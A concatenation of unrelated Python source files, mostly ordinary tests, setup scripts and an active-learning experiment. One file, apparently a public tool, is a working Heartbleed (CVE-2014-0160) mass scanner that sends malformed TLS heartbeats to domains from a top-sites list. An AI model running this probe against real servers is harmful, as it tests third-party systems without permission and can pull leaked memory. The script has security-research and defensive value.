path += '?' + env['QUERY_STRING']
if 'swift.authorize' in env:
resp = env['swift.authorize']()
if resp:
return resp(env, start_response)
req_headers = swob.Request(env).headers
self.swift_sources.append(env.get('swift.source'))
try:
resp_class, raw_headers, body = self._get_response(method, path)
headers = swob.HeaderKeyDict(raw_headers)
except KeyError:
if (env.get('QUERY_STRING')
and (method, env['PATH_INFO']) in self._responses):
resp_class, raw_headers, body = self._get_response(
method, env['PATH_INFO'])
headers = swob.HeaderKeyDict(raw_headers)
elif method == 'HEAD' and ('GET', path) in self._responses:
resp_class, raw_headers, body = self._get_response('GET', path)
body = None
headers = swob.HeaderKeyDict(raw_headers)
elif method == 'GET' and obj and path in self.uploaded:
resp_class = swob.HTTPOk
headers, body = self.uploaded[path]
else:
raise KeyError("Didn't find %r in allowed responses" % (
(method, path),))
self._calls.append((method, path, req_headers))
# simulate object PUT
if method == 'PUT' and obj:
input = env['wsgi.input'].read()
etag = md5(input).hexdigest()
headers.setdefault('Etag', etag)
headers.setdefault('Content-Length', len(input))
# keep it for subsequent GET requests later
self.uploaded[path] = (deepcopy(headers), input)
if "CONTENT_TYPE" in env:
self.uploaded[path][0]['Content-Type'] = env["CONTENT_TYPE"]
# range requests ought to work, hence conditional_response=True
req = swob.Request(env)
resp = resp_class(req=req, headers=headers, body=body,
conditional_response=True)
return resp(env, start_response)
@property
def calls(self):
return [(method, path) for method, path, headers in self._calls]
@property
def headers(self):
return [headers for method, path, headers in self._calls]
@property
def calls_with_headers(self):
return self._calls
@property
def call_count(self):
return len(self._calls)
def register(self, method, path, response_class, headers, body=''):
self._responses[(method, path)] = (response_class, headers, body)
def register_responses(self, method, path, responses):
self._responses[(method, path)] = list(responses)
| kalrey/swift | test/unit/common/middleware/helpers.py | Python | apache-2.0 | 4,791 |
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Quickly and dirtily modified by Mustafa Al-Bassam (mus@musalbas.com) to test
# the Alexa top X.
# Usage example: python ssltest.py top-1m.csv 10
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog file max', description='Test for SSL heartbleed vulnerability (CVE-2014-0160) on multiple domains, takes in Alexa top X CSV file')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b: b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin)
#print ' %04x: %-48s %s' % (b, hxdat, pdat)
#print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
try:
data = s.recv(remain)
except Exception, e:
return None
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
#print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
#print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
#print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
#print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
#print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
#print 'WARNING: server returned more data than it should - server is vulnerable!'
return True
else:
#print 'Server processed malformed heartbeat, but did not return any extra data.'
return False
if typ == 21:
#print 'Received alert:'
hexdump(pay)
#print 'Server returned error, likely not vulnerable'
return False
def is_vulnerable(domain):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
#print 'Connecting...'
#sys.stdout.flush()
try:
s.connect((domain, 443))
except Exception, e:
return None
#print 'Sending Client Hello...'
#sys.stdout.flush()
s.send(hello)
#print 'Waiting for Server Hello...'
#sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
#print 'Server closed connection without sending Server Hello.'
return None
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
#print 'Sending heartbeat request...'
#sys.stdout.flush()
s.send(hb)
return hit_hb(s)
def main():
opts, args = options.parse_args()
if len(args) < 2:
options.print_help()
return
counter_nossl = 0
counter_notvuln = 0
counter_vuln = 0
f = open(args[0], 'r')
for line in f:
rank, domain = line.split(',')
domain = domain.strip()
print "Testing " + domain + "... ",
sys.stdout.flush()
result = is_vulnerable(domain)
if result is None:
print "no SSL."
counter_nossl += 1
elif result:
print "vulnerable."
counter_vuln += 1
else:
print "not vulnerable."
counter_notvuln += 1
if int(rank) >= int(args[1]):
break
print
print "No SSL: " + str(counter_nossl)
print "Vulnerable: " + str(counter_vuln)
print "Not vulnerable: " + str(counter_notvuln)
if __name__ == '__main__':
main()
| 1n/heartbleed-masstest | ssltest.py | Python | cc0-1.0 | 5,278 |
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from unittest import main, TestCase
from json import loads
from functools import partial
from os.path import join
from tornado.web import HTTPError
from qiita_db.handlers.tests.oauthbase import OauthTestingBase
import qiita_db as qdb
from qiita_db.handlers.reference import _get_reference
class UtilTests(TestCase):
def test_get_reference(self):
with self.assertRaises(HTTPError):
_get_reference(100)
obs = _get_reference(1)
self.assertEqual(obs, qdb.reference.Reference(1))
class ReferenceFilepathsHandler(OauthTestingBase):
def test_get_reference_no_header(self):
obs = self.get('/qiita_db/references/1/filepaths/')
self.assertEqual(obs.code, 400)
def test_get_reference_does_not_exist(self):
obs = self.get('/qiita_db/references/100/filepaths/',
headers=self.header)
self.assertEqual(obs.code, 404)
def test_get(self):
obs = self.get('/qiita_db/references/1/filepaths/',
headers=self.header)
self.assertEqual(obs.code, 200)
db_test_raw_dir = qdb.util.get_mountpoint('reference')[0][1]
path_builder = partial(join, db_test_raw_dir)
exp_fps = [
[path_builder("GreenGenes_13_8_97_otus.fasta"), "reference_seqs"],
[path_builder("GreenGenes_13_8_97_otu_taxonomy.txt"),
"reference_tax"],
[path_builder("GreenGenes_13_8_97_otus.tree"), "reference_tree"]]
exp = {'filepaths': exp_fps}
self.assertEqual(loads(obs.body), exp)
if __name__ == '__main__':
main()
| squirrelo/qiita | qiita_db/handlers/tests/test_reference.py | Python | bsd-3-clause | 1,953 |
"""State API tests.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import json
import zlib
import mock
import treadmill.utils
from treadmill.api import state
def _create_zkclient_mock(placement_data):
data_watch_mock = mock.Mock(
side_effect=lambda func: func(placement_data, None, None)
)
zkclient_mock = mock.Mock()
zkclient_mock.DataWatch.return_value = data_watch_mock
return zkclient_mock
class ApiStateTest(unittest.TestCase):
"""treadmill.api.state tests."""
def setUp(self):
self.cell_state = state.CellState()
self.cell_state.scheduled = set(['foo.bar#0000000001'])
self.cell_state.running = set(['foo.bar#0000000001'])
self.cell_state.placement = {
'foo.bar#0000000001': {
'expires': 1234567890.1, 'host': 'baz1'
}
}
self.cell_state.finished = {
'foo.bar#0000000002': {
'data': '0.0', 'host': 'baz1',
'when': '123456789.2', 'state': 'finished'
},
'foo.bar#0000000003': {
'data': '255.0', 'host': 'baz1',
'when': '123456789.3', 'state': 'finished'
},
'foo.bar#0000000004': {
'data': '256.11', 'host': 'baz1',
'when': '1234567890.4', 'state': 'finished'
},
'foo.bar#0000000005': {
'data': 'oom', 'host': 'baz2',
'when': '1234567890.5', 'state': 'killed'
},
'foo.bar#0000000006': {
'data': None, 'host': 'baz2',
'when': 1234567890.6, 'state': 'terminated'
},
'foo.bar#0000000007': {
'data': 'TypeError', 'host': 'baz2',
'when': '1234567890.7', 'state': 'aborted'
}
}
# Disable the exit on exception hack for tests
self.old_exit_on_unhandled = treadmill.utils.exit_on_unhandled
treadmill.utils.exit_on_unhandled = mock.Mock(side_effect=lambda x: x)
def tearDown(self):
# Restore the exit on exception hack for tests
treadmill.utils.exit_on_unhandled = self.old_exit_on_unhandled
@mock.patch('treadmill.context.GLOBAL', mock.Mock())
@mock.patch('treadmill.api.state.watch_running', mock.Mock())
@mock.patch('treadmill.api.state.watch_placement', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished_history', mock.Mock())
@mock.patch('treadmill.api.state.CellState')
def test_get(self, cell_state_cls_mock):
"""Tests for treadmill.api.state.get()"""
cell_state_cls_mock.return_value = self.cell_state
state_api = state.API()
self.assertEqual(
state_api.get('foo.bar#0000000001'),
{'host': 'baz1', 'state': 'running',
'expires': 1234567890.1, 'name': 'foo.bar#0000000001'}
)
self.assertEqual(
state_api.get('foo.bar#0000000002'),
{'host': 'baz1', 'name': 'foo.bar#0000000002', 'oom': False,
'when': '123456789.2', 'state': 'finished', 'exitcode': 0}
)
self.assertEqual(
state_api.get('foo.bar#0000000003'),
{'host': 'baz1', 'name': 'foo.bar#0000000003', 'oom': False,
'when': '123456789.3', 'state': 'finished', 'exitcode': 255}
)
self.assertEqual(
state_api.get('foo.bar#0000000004'),
{'host': 'baz1', 'name': 'foo.bar#0000000004', 'oom': False,
'signal': 11, 'when': '1234567890.4', 'state': 'finished'}
)
self.assertEqual(
state_api.get('foo.bar#0000000005'),
{'oom': True, 'host': 'baz2', 'when': '1234567890.5',
'name': 'foo.bar#0000000005', 'state': 'killed'}
)
self.assertEqual(
state_api.get('foo.bar#0000000006'),
{'oom': False, 'host': 'baz2', 'when': 1234567890.6,
'name': 'foo.bar#0000000006', 'state': 'terminated'}
)
self.assertEqual(
state_api.get('foo.bar#0000000007'),
{'oom': False, 'host': 'baz2', 'when': '1234567890.7',
'name': 'foo.bar#0000000007', 'state': 'aborted',
'aborted_reason': 'TypeError'}
)
@mock.patch('treadmill.context.GLOBAL', mock.Mock())
@mock.patch('treadmill.api.state.watch_running', mock.Mock())
@mock.patch('treadmill.api.state.watch_placement', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished_history', mock.Mock())
@mock.patch('treadmill.api.state.CellState')
def test_list(self, cell_state_cls_mock):
"""Tests for treadmill.api.state.list()"""
cell_state_cls_mock.return_value = self.cell_state
state_api = state.API()
self.assertEqual(
state_api.list(),
[
{'host': 'baz1', 'state': 'running',
'name': 'foo.bar#0000000001', 'expires': 1234567890.1}
]
)
self.assertEqual(
state_api.list('foo.bar#000000000[12]', True),
[
{'host': 'baz1', 'state': 'running',
'name': 'foo.bar#0000000001', 'expires': 1234567890.1},
{'host': 'baz1', 'name': 'foo.bar#0000000002', 'oom': False,
'when': '123456789.2', 'state': 'finished', 'exitcode': 0}
]
)
@mock.patch('treadmill.context.AdminContext.server')
@mock.patch('treadmill.context.Context.cell', mock.Mock())
@mock.patch('treadmill.context.Context.zk', mock.Mock())
@mock.patch('treadmill.api.state.watch_running', mock.Mock())
@mock.patch('treadmill.api.state.watch_placement', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished_history', mock.Mock())
@mock.patch('treadmill.api.state.CellState')
def test_list_partition(self, cell_state_cls_mock, server_factory):
"""Tests for treadmill.api.state.list() with partition"""
cell_state_cls_mock.return_value = self.cell_state
admin_srv = server_factory.return_value
admin_srv.list.return_value = [
{'cell': 'x', 'traits': [], '_id': 'baz1', 'partition': 'part1'},
{'cell': 'x', 'traits': [], '_id': 'baz2', 'partition': 'part2'}
]
state_api = state.API()
self.assertEqual(
state_api.list('foo.bar#000000000[1234567]', True, 'part1'),
[
{'host': 'baz1', 'state': 'running',
'name': 'foo.bar#0000000001', 'expires': 1234567890.1},
{'host': 'baz1', 'name': 'foo.bar#0000000002', 'oom': False,
'when': '123456789.2', 'state': 'finished', 'exitcode': 0},
{'host': 'baz1', 'name': 'foo.bar#0000000003', 'oom': False,
'when': '123456789.3', 'state': 'finished', 'exitcode': 255},
{'host': 'baz1', 'name': 'foo.bar#0000000004', 'oom': False,
'signal': 11, 'when': '1234567890.4', 'state': 'finished'}
]
)
def test_watch_placement(self):
"""Test loading placement.
"""
cell_state = state.CellState()
cell_state.running = ['foo.bar#0000000001']
zkclient_mock = _create_zkclient_mock(
zlib.compress(
json.dumps([
[
'foo.bar#0000000001',
'baz', 12345.67890,
'baz', 12345.67890
],
[
'foo.bar#0000000002',
'baz', 12345.67890,
'baz', 12345.67890
],
[
'foo.bar#0000000003',
None, None,
None, None
],
]).encode() # compress needs bytes
)
)
state.watch_placement(zkclient_mock, cell_state)
self.assertEqual(
cell_state.placement,
{
'foo.bar#0000000001': {
'expires': 12345.6789, 'host': 'baz'
},
'foo.bar#0000000002': {
'expires': 12345.6789, 'host': 'baz'
},
}
)
if __name__ == '__main__':
unittest.main()
| Morgan-Stanley/treadmill | lib/python/treadmill/tests/api/state_test.py | Python | apache-2.0 | 8,703 |
"""
Init file.
"""
from flask import Flask
import flask.ext.uploads as uploads
flask_app = Flask(__name__)
flask_app.config.from_object('app.config')
flask_app.config.from_envvar('FLASKR_SETTINGS', silent = True)
files_uploads = uploads.UploadSet(extensions = uploads.ALL)
uploads.configure_uploads(flask_app, files_uploads)
from app import views, logger
| rubikonx9/valvis | app/__init__.py | Python | gpl-2.0 | 361 |
# $Id$
#
# pjsua2 Setup script.
#
# Copyright (C)2012 Teluu Inc. (http://www.teluu.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
from distutils.core import setup, Extension
import os
import sys
import platform
# find pjsip version
pj_version=""
pj_version_major=""
pj_version_minor=""
pj_version_rev=""
pj_version_suffix=""
f = open('../../../../version.mak', 'r')
for line in f:
if line.find("export PJ_VERSION_MAJOR") != -1:
tokens=line.split("=")
if len(tokens)>1:
pj_version_major= tokens[1].strip()
elif line.find("export PJ_VERSION_MINOR") != -1:
tokens=line.split("=")
if len(tokens)>1:
pj_version_minor= line.split("=")[1].strip()
elif line.find("export PJ_VERSION_REV") != -1:
tokens=line.split("=")
if len(tokens)>1:
pj_version_rev= line.split("=")[1].strip()
elif line.find("export PJ_VERSION_SUFFIX") != -1:
tokens=line.split("=")
if len(tokens)>1:
pj_version_suffix= line.split("=")[1].strip()
f.close()
if not pj_version_major:
print 'Unable to get PJ_VERSION_MAJOR'
sys.exit(1)
pj_version = pj_version_major + "." + pj_version_minor
if pj_version_rev:
pj_version += "." + pj_version_rev
if pj_version_suffix:
pj_version += "-" + pj_version_suffix
#print 'PJ_VERSION = "'+ pj_version + '"'
# Get 'make' from environment variable if any
MAKE = os.environ.get('MAKE') or "make"
# Get targetname
f = os.popen("%s --no-print-directory -f helper.mak target_name" % MAKE)
pj_target_name = f.read().rstrip("\r\n")
f.close()
# Fill in extra_compile_args
extra_compile_args = []
f = os.popen("%s --no-print-directory -f helper.mak cflags" % MAKE)
for line in f:
extra_compile_args.append(line.rstrip("\r\n"))
f.close()
# Fill in libraries
libraries = []
f = os.popen("%s --no-print-directory -f helper.mak libs" % MAKE)
for line in f:
libraries.append(line.rstrip("\r\n"))
f.close()
# Fill in extra_link_args
extra_link_args = []
f = os.popen("%s --no-print-directory -f helper.mak ldflags" % MAKE)
for line in f:
extra_link_args.append(line.rstrip("\r\n"))
f.close()
# MinGW specific action: put current working dir to PATH, so Python distutils
# will invoke our dummy gcc/g++ instead, which is in the current working dir.
if platform.system()=='Windows' and os.environ["MSYSTEM"].find('MINGW')!=-1:
os.environ["PATH"] = "." + os.pathsep + os.environ["PATH"]
setup(name="pjsua2",
version=pj_version,
description='SIP User Agent Library based on PJSIP',
url='http://www.pjsip.org',
ext_modules = [Extension("_pjsua2",
["pjsua2_wrap.cpp"],
libraries=libraries,
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args
)
],
py_modules=["pjsua2"]
)
| pol51/PJSIP-CMake | pjsip-apps/src/swig/python/setup.py | Python | gpl-2.0 | 3,527 |
# start the service
twitter = Runtime.start("twitter","Twitter") | MyRobotLab/pyrobotlab | service/Twitter.py | Python | apache-2.0 | 64 |
__author__ = 'maru'
__copyright__ = "Copyright 2013, ML Lab"
__version__ = "0.1"
__status__ = "Development"
import sys
import os
sys.path.append(os.path.abspath("."))
from experiment_utils import *
import argparse
from sklearn.datasets.base import Bunch
from sklearn import linear_model
import time
from sklearn import metrics
from collections import defaultdict
from datautil.textutils import StemTokenizer
from strategy import randomsampling
from expert import baseexpert
import pickle
from datautil.load_data import *
############# COMMAND LINE PARAMETERS ##################
ap = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawTextHelpFormatter)
ap.add_argument('--train',
metavar='TRAIN',
default="20news",
help='training data (libSVM format)')
ap.add_argument('--neutral_threshold',
metavar='NEUTRAL',
type=float,
default=.4,
help='neutrality threshold of uncertainty')
ap.add_argument('--trials',
metavar='TRIALS',
type=int,
default=5,
help='number of trials')
ap.add_argument('--folds',
metavar='FOLDS',
type=int,
default=1,
help='number of folds')
ap.add_argument('--budget',
metavar='BUDGET',
type=int,
default=20000,
help='budget')
ap.add_argument('--step-size',
metavar='STEP_SIZE',
type=int,
default=10,
help='instances to acquire at every iteration')
ap.add_argument('--bootstrap',
metavar='BOOTSTRAP',
type=int,
default=50,
help='size of the initial labeled dataset')
ap.add_argument('--cost-function',
metavar='COST_FUNCTION',
type=str,
default="direct",
help='cost function of the x-axis [uniform|log|linear]')
ap.add_argument('--cost-model',
metavar='COST_MODEL',
type=str,
default="[[10.0,5.7], [25.0,8.2], [50.1,10.9], [75,15.9], [100,16.7], [125,17.8], [150,22.7], [175,19.9], [200,17.4]]",
help='cost function parameters of the cost function')
ap.add_argument('--fixk',
metavar='FIXK',
type=int,
default=10,
help='fixed k number of words')
ap.add_argument('--maxiter',
metavar='MAXITER',
type=int,
default=2000,
help='Max number of iterations')
ap.add_argument('--seed',
metavar='SEED',
type=int,
default=8765432,
help='Max number of iterations')
args = ap.parse_args()
rand = np.random.mtrand.RandomState(args.seed)
print args
print
def load_fixkdata(dataset_name,categories, min_size, vct):
fixk = [25, 50, 75, 100]
all_data = Bunch()
data1 = load_dataset(dataset_name, 10, categories[0], vct, min_size, percent=.5)
fixk_saved = "{0}{1}.p".format(dataset_name, 10)
try:
print "Loading existing file..."
fixk_file = open(fixk_saved, "rb")
data1 = pickle.load(fixk_file)
vectorizer = open("{0}vectorizer.p".format(dataset_name), "rb")
vct = pickle.load(vectorizer)
except IOError:
print "Loading from scratch..."
data1 = load_dataset(dataset_name, 10, categories[0], vct, min_size, percent=.5)
fixk_file = open(fixk_saved, "wb")
pickle.dump(data1, fixk_file)
vectorizer = open("{0}vectorizer.p".format(dataset_name), "wb")
pickle.dump(vct, vectorizer)
all_data['text'] = data1.train.data
all_data['train'] = data1.train.bow
all_data['10'] = data1.train
all_data['test'] = data1.test
all_data['target'] = data1.target
for k in fixk:
fixk_saved = "{0}{1}.p".format(dataset_name, k)
try:
fixk_file = open(fixk_saved, "rb")
data = pickle.load(fixk_file)
except IOError:
fixk_file = open(fixk_saved, "wb")
data = process_data(data1, k, 100, vct, silent=True)
pickle.dump(data, fixk_file)
data.train.data = None
all_data[str(k)] = data.train
return all_data
####################### MAIN ####################
def main():
accuracies = defaultdict(lambda: [])
aucs = defaultdict(lambda: [])
x_axis = defaultdict(lambda: [])
vct = CountVectorizer(encoding='ISO-8859-1', min_df=5, max_df=1.0, binary=True, ngram_range=(1, 3),
token_pattern='\\b\\w+\\b', tokenizer=StemTokenizer())
vct_analizer = vct.build_tokenizer()
print("Start loading ...")
# data fields: data, bow, file_names, target_names, target
########## NEWS GROUPS ###############
# easy to hard. see "Less is More" paper: http://axon.cs.byu.edu/~martinez/classes/678/Presentations/Clawson.pdf
categories = [['alt.atheism', 'talk.religion.misc'],
['comp.graphics', 'comp.windows.x'],
['comp.os.ms-windows.misc', 'comp.sys.ibm.pc.hardware'],
['rec.sport.baseball', 'sci.crypt']]
min_size = max(100, args.fixk)
# data = load_dataset(args.train, args.fixk, categories[0], vct, min_size)
alldata = load_fixkdata(args.train)
print("Data %s" % args.train)
print("Data size %s" % len(alldata.train.data))
parameters = parse_parameters_mat(args.cost_model)
print "Cost Parameters %s" % parameters
cost_model = set_cost_model(args.cost_function, parameters=parameters)
print "\nCost Model: %s" % cost_model.__class__.__name__
#### STUDENT CLASSIFIER
clf = linear_model.LogisticRegression(penalty="l1", C=1)
print "\nStudent Classifier: %s" % clf
#### EXPERT CLASSIFIER
exp_clf = linear_model.LogisticRegression(penalty='l1', C=.3)
exp_clf.fit(alldata.test.bow, alldata.test.target)
expert = baseexpert.NeutralityExpert(exp_clf, threshold=args.neutral_threshold,
cost_function=cost_model.cost_function)
print "\nExpert: %s " % expert
#### ACTIVE LEARNING SETTINGS
step_size = args.step_size
bootstrap_size = args.bootstrap
evaluation_points = 200
print("\nExperiment: step={0}, BT={1}, plot points={2}, fixk:{3}, minsize:{4}".format(step_size, bootstrap_size,
evaluation_points, args.fixk,
min_size))
print ("Anytime active learning experiment - use objective function to pick data")
t0 = time.time()
tac = []
tau = []
### experiment starts
for t in range(args.trials):
trial_accu = []
trial_aucs = []
print "*" * 60
print "Trial: %s" % t
student = randomsampling.AnytimeLearner(model=clf, accuracy_model=None, budget=args.budget, seed=t, vcn=vct,
subpool=250, cost_model=cost_model)
print "\nStudent: %s " % student
train_indices = []
neutral_text = []
train_x = []
train_y = []
neu_x = []
neu_y = []
pool = Bunch()
pool.data = alldata.train.tocsr() # full words, for training
pool.text = alldata.text
# pool.fixk = data.train.bowk.tocsr() # k words BOW for querying
pool.target = alldata.target
pool.predicted = []
# pool.kwords = np.array(data.train.kwords) # k words
pool.remaining = set(range(pool.data.shape[0])) # indices of the pool
bootstrapped = False
current_cost = 0
iteration = 0
while 0 < student.budget and len(pool.remaining) > step_size and iteration <= args.maxiter:
if not bootstrapped:
## random from each bootstrap
bt = randomsampling.BootstrapFromEach(t * 10)
query_index = bt.bootstrap(pool=pool, k=bootstrap_size)
bootstrapped = True
query = pool.data[query_index]
print "Bootstrap: %s " % bt.__class__.__name__
print
else:
print "pick instance"
query_chosen = student.pick_next(pool=pool, step_size=step_size)
query_index = [a for a, b in query_chosen]
query_size = [b for a, b in query_chosen]
# query = pool.fixk[query_index] # query with k words
qk = []
for q, k in query_chosen:
qk.append(" ".join(vct_analizer(pool.text[q])[0:int(k)]))
query = vct.transform(qk)
# query_size = [len(vct_analizer(x)) for x in pool.kwords[query_index]]
ground_truth = pool.target[query_index]
#labels, spent = expert.label(unlabeled=query, target=ground_truth)
if iteration == 0: ## bootstrap uses ground truth
labels = ground_truth
spent = [0] * len(ground_truth) ## bootstrap cost is ignored
else:
print "ask labels"
labels = expert.label_instances(query, ground_truth)
spent = expert.estimate_instances(query_size)
### accumulate the cost of the query
query_cost = np.array(spent).sum()
current_cost += query_cost
useful_answers = np.array([[x, y] for x, y in zip(query_index, labels) if y is not None])
neutral_answers = np.array([[x, z] for x, y, z in zip(query_index, labels, query_size) if y is None]) \
if iteration != 0 else np.array([])
## add data recent acquired to train
if useful_answers.shape[0] != 0:
print "get training"
# train_indices.extend(query_index)
train_indices.extend(useful_answers[:, 0])
# add labels to training
train_x = pool.data[train_indices] # # train with all the words
# update labels with the expert labels
#train_y = pool.target[train_indices]
train_y.extend(useful_answers[:, 1])
if neutral_answers.shape[0] != 0: # # update neutral dataset, save index, sizek, labels
## todo craete neutral by separating the indicex and the k, then selecting accordingly
neutral = [" ".join(vct_analizer(pool.text[idoc])[0:fixk]) for idoc, fixk in neutral_answers.astype(int)]
neutral_text.extend(neutral)
## get the non-neutral instances
# neu_x = pool.text[train_indices]
neu_x = [pool.text[idoc] for idoc in train_indices]
neu_y = [1] * len(neu_x)
neu_x.extend(neutral_text)
neu_y.extend([0] * len(neutral_text))
neu_y = np.array(neu_y)
#end usefulanswers
if train_x.shape[0] != len(train_y):
raise Exception("Training data corrupted!")
# remove labels from pool
pool.remaining.difference_update(query_index)
# retrain the model
# current_model = student.train(train_x, train_y)
print "train models"
current_model = student.train_all(train_x, train_y, neu_x, neu_y)
print "evaluate"
# evaluate and save results
y_probas = current_model.predict_proba(data.test.bow)
auc = metrics.roc_auc_score(data.test.target, y_probas[:, 1])
pred_y = current_model.classes_[np.argmax(y_probas, axis=1)]
accu = metrics.accuracy_score(data.test.target, pred_y)
print ("TS:{0}\tAccu:{1:.3f}\tAUC:{2:.3f}\tCost:{3:.2f}\tCumm:{4:.2f}\tSpent:{5}\tneu:{6}".format(len(train_indices),
accu,
auc, query_cost,
current_cost,
spent, len(neutral_answers)))
## the results should be based on the cost of the labeling
if iteration > 0: # bootstrap iteration
student.budget -= query_cost ## Bootstrap doesn't count
x_axis_range = current_cost
x_axis[x_axis_range].append(current_cost)
## save results
accuracies[x_axis_range].append(accu)
aucs[x_axis_range].append(auc)
# partial trial results
trial_accu.append([x_axis_range, accu])
trial_aucs.append([x_axis_range, auc])
iteration += 1
# end of budget loop
tac.append(trial_accu)
tau.append(trial_aucs)
#end trial loop
accuracies = extrapolate_trials(tac)
aucs = extrapolate_trials(tau)
print("Elapsed time %.3f" % (time.time() - t0))
print_extrapolated_results(accuracies, aucs)
if __name__ == '__main__':
main()
| mramire8/active | experiment/anytimev2.py | Python | apache-2.0 | 13,575 |
#!/usr/bin/python
import os.path
import unittest
def get_tests():
start_dir = os.path.dirname(__file__)
return unittest.TestLoader().discover(start_dir, pattern="*.py") | kamaxeon/prpg | tests/__init__.py | Python | apache-2.0 | 177 |
## begin license ##
#
# "Digitale Collectie ErfGeo Enrichment" is a service that attempts to automatically create
# geographical enrichments for records in "Digitale Collectie" (http://digitalecollectie.nl)
# by querying the ErfGeo search API (https://erfgeo.nl/search).
# "Digitale Collectie ErfGeo Enrichment" is developed for Stichting DEN (http://www.den.nl)
# and the Netherlands Institute for Sound and Vision (http://instituut.beeldengeluid.nl/)
# by Seecr (http://seecr.nl).
# The project is based on the open source project Meresco (http://meresco.org).
#
# Copyright (C) 2011-2012, 2015 Netherlands Institute for Sound and Vision http://instituut.beeldengeluid.nl/
# Copyright (C) 2011-2012, 2015 Seecr (Seek You Too B.V.) http://seecr.nl
# Copyright (C) 2015 Stichting DEN http://www.den.nl
#
# This file is part of "Digitale Collectie ErfGeo Enrichment"
#
# "Digitale Collectie ErfGeo Enrichment" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Digitale Collectie ErfGeo Enrichment" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Digitale Collectie ErfGeo Enrichment"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
from unittest import TestCase
from seecr.test import CallTrace
from meresco.core import Observable
from digitalecollectie.erfgeo.adoptoaisetspecs import AdoptOaiSetSpecs, prefixWithRepositoryGroupId, prefixWithCollection
class AdoptOaiSetSpecsTest(TestCase):
def testPrefixSetWithRepositoryGroupId(self):
observable = Observable()
adoptOaiSetSpecs = AdoptOaiSetSpecs(newSetSpecsFromOriginals=prefixWithRepositoryGroupId)
observer = CallTrace('observer')
observable.addObserver(adoptOaiSetSpecs)
adoptOaiSetSpecs.addObserver(observer)
__callstack_dict__ = {
'repositoryGroupId': 'x:y%z',
'setSpecs': ['set1', 'set2']
}
observable.do.addOaiRecord(
identifier='identifier',
setSpecs=['aSet'],
metadataPrefixes=['ese']
)
self.assertEquals(['addOaiRecord'], [m.name for m in observer.calledMethods])
self.assertEquals(
{
'identifier': 'identifier',
'metadataPrefixes': ['ese'],
'setSpecs': ['aSet', 'x:y%25z', 'x:y%25z:set1', 'x:y%25z:set2']
},
observer.calledMethods[0].kwargs
)
def testPrefixSetWithCollection(self):
